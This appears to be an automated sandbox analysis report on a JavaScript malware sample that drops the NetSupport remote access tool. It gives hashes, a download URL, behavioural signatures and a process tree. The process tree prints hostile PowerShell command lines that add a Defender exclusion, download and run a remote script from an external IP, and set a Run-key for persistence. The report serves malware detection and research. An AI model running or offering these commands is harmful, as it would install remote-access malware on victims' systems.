Analysis
-
max time kernel
143s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
27/05/2023, 08:56
Static task
static1
Behavioral task
behavioral1
Sample
02303299.js
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
02303299.js
Resource
win10v2004-20230220-en
General
-
Target
02303299.js
-
Size
1KB
-
MD5
c80a26b806b3486c6157d8904c2e13e7
-
SHA1
54d8be3eb5bdd4a788dcef3265cab6c314be1ccc
-
SHA256
64339638d9234ab1efe25fe180b3097a6614687c8f83b1cc0c5a1dde570aaf81
-
SHA512
4b7c084016a3fb20ae5b95c51c0459c327b163f0d7d942d931182009cd4bde50f24a867d7e60b62a6801189bcb4bba425b474e85b009ccb27e88bc3af6f59200
Malware Config
Extracted
http://golden-scalen.com/ngg_cl.zip
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5020 1364 cmd.exe 32 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 936 1364 cmd.exe 32 -
Blocklisted process makes network request 2 IoCs
flow pid Process 3 4280 wscript.exe 13 3844 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 4768 client32.exe -
Loads dropped DLL 6 IoCs
pid Process 4768 client32.exe 4768 client32.exe 4768 client32.exe 4768 client32.exe 4768 client32.exe 4768 client32.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VCRuntmeLib_1 = "C:\\Users\\Admin\\AppData\\Roaming\\VCRuntmeLib_1\\client32.exe" powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings cmd.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 3920 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3844 powershell.exe 3844 powershell.exe 4976 powershell.exe 4976 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3844 powershell.exe Token: SeDebugPrivilege 4976 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 5020 wrote to memory of 3540 5020 cmd.exe 88 PID 5020 wrote to memory of 3540 5020 cmd.exe 88 PID 3540 wrote to memory of 3844 3540 cmd.exe 90 PID 3540 wrote to memory of 3844 3540 cmd.exe 90 PID 936 wrote to memory of 3920 936 cmd.exe 91 PID 936 wrote to memory of 3920 936 cmd.exe 91 PID 3540 wrote to memory of 4976 3540 cmd.exe 92 PID 3540 wrote to memory of 4976 3540 cmd.exe 92 PID 4976 wrote to memory of 4768 4976 powershell.exe 101 PID 4976 wrote to memory of 4768 4976 powershell.exe 101 PID 4976 wrote to memory of 4768 4976 powershell.exe 101
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\02303299.js1⤵
- Blocklisted process makes network request
PID:4280
-
C:\Windows\system32\cmd.execmd /c start /MIN C:\ProgramData\BLD.bat1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\ProgramData\BLD.bat2⤵
- Suspicious use of WriteProcessMemory
PID:3540 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -WindowStyle hidden "Add-MpPreference -ExclusionExtension "Start-Sleep -Seconds 3;"Invoke-WebRequest 'http://188.227.59.169/zayavka/1.yay' -OutFile 'C:\ProgramData\archive.ps1'";3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -w hidden -ep bypass C:\ProgramData\archive.ps13⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe"C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4768
-
-
-
-
C:\Windows\system32\cmd.execmd /c start C:\ProgramData\zayavka2.txt1⤵
- Process spawned unexpected child process
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:936 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\zayavka2.txt2⤵
- Opens file in notepad (likely ransom note)
PID:3920
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
322B
MD5018d63793042f588a85968475d98decf
SHA12c4f9a0bd490c2b53976adf08805dcc92fac349a
SHA256afa8d3929a2809a91ffaa775fcc953b293e52b8accce3cd24c843cb0abbd13d0
SHA512ee91d2218f6ac4d763858c8be3cc7ee23660de14e8dd6aea2a4a40b45a5aa6c3337ac13a366db52aab796f04058e2ec92ec81dec6c3cb93d4c310f59a6f9f98a
-
Filesize
905B
MD550dc5faa02227c0aefa8b54c8e5b2b0d
SHA127fe39b6b053685d4c781a7fa809840ebaab15d7
SHA256aafc02e9f9c6ce1e9ff7aff753e5656d3d26041e06b78a9fd60ca6fe5127e09b
SHA5125bb8701fa6b026e99a8f269b89660ee8abba7c88a654f756d455a13e418a29c75e1742278046985bcc599151f0838591ef58ae8f742016153e43c8c5a78da442
-
Filesize
1KB
MD56cea5f86700d707b53b8f4a67d1ccf29
SHA137e53dd35cbf58bd9c3b7ba0bbd7be81fcb9fe54
SHA2566e9ba5a17bb1ee71c64337b4cd794336eaed26e79d5e2eba6c31018bc9103c70
SHA512d836c1624995dd93462fa462ec83c5c150189c0e7b2c0c9eeb923c7b7aec40aa91e27f10ac7b5a4dc8e78c2dc8df121c97022e9b8fbdaf0d5c93f59a0e535c29
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD502a1a26525c65a359d41483180eaa6f7
SHA1c0e2578b92d20e925c1c87016d1a9fccee1ec56f
SHA256d0ec351493bdbc6cb94990b162bb8be5b0217277cc55ae12aa3c7ea704cdbc6e
SHA512d3271137241553f8316fcfc94dcf88c2887ee7bb0babddb4c1666fb5ae821a28425400299281422a4ebeb1f4c7369443b839d10f182279504bbba5f2f1cd94c2
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
320KB
MD52d3b207c8a48148296156e5725426c7f
SHA1ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA51255c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c
-
Filesize
18KB
MD5a0b9388c5f18e27266a31f8c5765b263
SHA1906f7e94f841d464d4da144f7c858fa2160e36db
SHA256313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA5126051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd
-
Filesize
3.6MB
MD500587238d16012152c2e951a087f2cc9
SHA1c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA25663aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226
-
Filesize
101KB
MD5c4f1b50e3111d29774f7525039ff7086
SHA157539c95cba0986ec8df0fcdea433e7c71b724c6
SHA25618df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d
SHA512005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5
-
Filesize
101KB
MD5c4f1b50e3111d29774f7525039ff7086
SHA157539c95cba0986ec8df0fcdea433e7c71b724c6
SHA25618df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d
SHA512005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5
-
Filesize
755KB
MD50e37fbfa79d349d672456923ec5fbbe3
SHA14e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA2568793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA5122bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630
-
Filesize
755KB
MD50e37fbfa79d349d672456923ec5fbbe3
SHA14e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA2568793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA5122bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630
-
Filesize
32KB
MD5dcde2248d19c778a41aa165866dd52d0
SHA17ec84be84fe23f0b0093b647538737e1f19ebb03
SHA2569074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166